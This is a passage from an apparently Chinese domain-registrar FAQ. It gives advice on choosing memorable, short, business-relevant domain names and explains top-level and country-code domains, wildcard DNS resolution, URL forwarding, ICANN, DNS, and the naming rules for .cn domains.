网易现在已在品牌宣传上放弃域名nease.com和netease.com,而改用163.com,因为后者比前者更好记。
b) 要同你的商业有直接关系
虽然有好多域名很容易记,但如果同你所开展的商业活动没有任何关系,用户就不能将你的域名同你的商业活动联系起来,这就意味着你还要花钱宣传你的域名。例如,一看到DrugStore.com马上知道是网上药店。
c) 长度要短
长度短的域名不但容易记,而且用户花费更少的时间来输入你的域名。例如美国最大的传统连锁书店 Barnes & Noble开设了网上书店,原来用的域名为barnesandnoble.com,自从改为bn.com后,访问量和销量有了很大的增长。
d) 正确拼写英文单词或拼音
如果你以英文单词或拼音作为域名,一定要拼写正确。
e) 用你的商标或企业名称
如果你已注册了商标,请将商标名称作为域名。如果你面对的是本地市场,请将企业名称作为域名;如果要面向国际市场,请遵守上面的原则2。
f) 注册.com下的域名
.com是首选的顶级域名,可显示企业的全球化理念。
g) 不要侵犯人家的商标
新的全球域名政策规定所注册的域名不能包含商标或名人的名字,如果你的域名违反了这条原则,不但会失去所注册域名的拥有权,而且将被罚款和起诉。
7.域名的构成
顶级域名:一个域名由两个以上的词段构成,最右边的就是顶级域名。
目前,国际上出现的顶级域名有.com,.net,.org,.gov,.edu,.mil,.cc,.to,.tv以及国家或地区的代码,其中最通用的是.com,.net,.org
.COM - -适用于商业实体,它是最流行的顶级域名,任何人都可注册一个.com域名。
.NET - -最初用于网络机构如ISP,今天,任何一个人都可注册一个.net域名。
.ORG ---设计是用于各类组织机构,包括非盈利团体,今天,任何一个人都可注册一个.org域名。 国家代码:像cn(中国),fr(法国)和au(澳大利亚)这样两个字母的域名谓之国家代码顶级域名(ccTLDs),通过ccTLDs,基本上可以辨明域名持有者的国家或地区。详细的国家代码可在www.icann.org查找。
二级域名:靠左边的部分就是所谓的二级域名,在cctv.com中,cctv就是顶级域名.com下的二级域名,cctv.com还可以有mail.cctv.com的形式,这里的mail可以谓之”主机”或”子域名”。
8.什么是泛域名解析
泛域名解析定义为:
客户的域名a.com,之下所设的*.a.com全部解析到同一个IP地址上去。比如客户设b.a.com就会自已自动解析到与a.com同一个IP地址上去,显示的是跟a.com一样的页面。
URL转发功能是我公司提供的域名注册后的增值服务。所谓URL转发,是通过服务器的特殊设置,将访问您当前域名的用户引导到您指定的另一个网络地址。例如,URL转发可以让用户在访问http://www.yourdomain.com时,自动转向访问http://www.otherdomain.com/other.htm。
9.域名的结构
顶级域名
域名由两个或两个以上的词构成, 中间由点号分隔开。最右边的那个词称为顶级域名。下面是几个常见的顶级域名及其用法:
.COM--用于商业机构。它是最常见的顶级域名。任何人都可以注册.COM 形式的域名。
.NET--最初是用于网络组织,例如因特网服务商和维修商。现在任何人都可以注册以.NET结尾的域名。
.ORG--是为各种组织包括非盈利组织而定的。现在,任何人都可以注册以.ORG 结尾的域名。
国家代码由两个字母组成的顶级域名如.cn, .uk, .de和.jp称为国家代码顶级域名(ccTLDs), 其中.cn是中国专用的顶级域名, 其注册归CNNIC管理, 以.cn结尾的二级域名我们简称为国内域名。注册国家代码顶级域名下的二级域名的规则和政策与不同的国家的政策有关。您在注册时应咨询域名注册机构, 问清相关的注册条件及与注册相关的条款。某些域名注册商除了提供以.com, .net和.org结尾的域名的注册服务之外, 还提供国家代码顶级域名的注册。ICANN并没有特别授权注册商提供国家代码顶级域名的注册服务。
二级域名
顶级域名的下一级,就是我们所说的二级域名。domainpeople.com,域名注册人在以.com结尾的顶级域名中,提供一个二级域名。域名形式也可能是something.domainpeople.com。在这种情况下,something 称为主名或分域名。
谁是国际域名管理机构 ICANN是一个近年成立的、代替NSI公司的的非盈利机构,其主要职能包括管理因特网域名及地址系统。有关ICANN的信息可在网址 http://www.icann.org 中查询。
什么是域名地址服务器(即DNS)
域名服务器用于把域名翻译成电脑能识别的IP地址。例如,如果有人要访问sohu的网站 (www.sohu.com), DNS就把域名译为IP地址 61.135.132.3 。这样就便于电脑查找域名所有人的网站服务器。
10.Internet上域名命名的一般规则是什么?
由于Internet上的各级域名是分别由不同机构管理的,所以,各个机构管理域名的方式和域名命名的规则也有所不同。但域名的命名也有一些共同的规则,主要有以下几点:
一、域名中只能包含以下字符:
1. 26个英文字母
2. ”0,1,2,3,4,5,6,7,8,9”十个数字
3. ”-”(英文中的连词号)
二、域名中字符的组合规则:
1.在域名中,不区分英文字母的大小写
2.对于一个域名的长度是有一定限制的 CN下域名命名的规则为:
1)遵照域名命名的全部共同规则
2)只能注册三级域名,三级域名用字母(A-0Z,a-z,大小写等价)、数字(0-9)和连接符(-)组成,各级域名之间用实点(.)连接,三级域名长度不得超过20个字符;
三、不得使用,或限制使用以下名称(下表列出了一些注册此类域名时需要提供的材料):
1)注册含有”CHINA”、”CHINESE”、”CN”、”NATIONAL”等 经国家有关部门(指部级以上单位)正式批准
2)公众知晓的其他国家或者地区名称、外国地名、国际组织名称不得使用
3)县级以上(含县级)行政区划名称的全称或者缩写 相关县级以上(含县级)人民政府正式批准
4)行业名称或者商品的通用名称不得使用
5)他人已在中国注册过的企业名称或者商标名称不得使用
6)对国家、社会或者公共利益有损害的名称不得使用
7)经国家有关部门(指部级以上单位)正式批准和相关县级以上(含县级)人民政府正式批准是指,相关机构要出据书面文件表示同意XXXX单位注册XXX域名。如:要申请beijing.com.cn域名,则要提供北京市人民政府的批文。
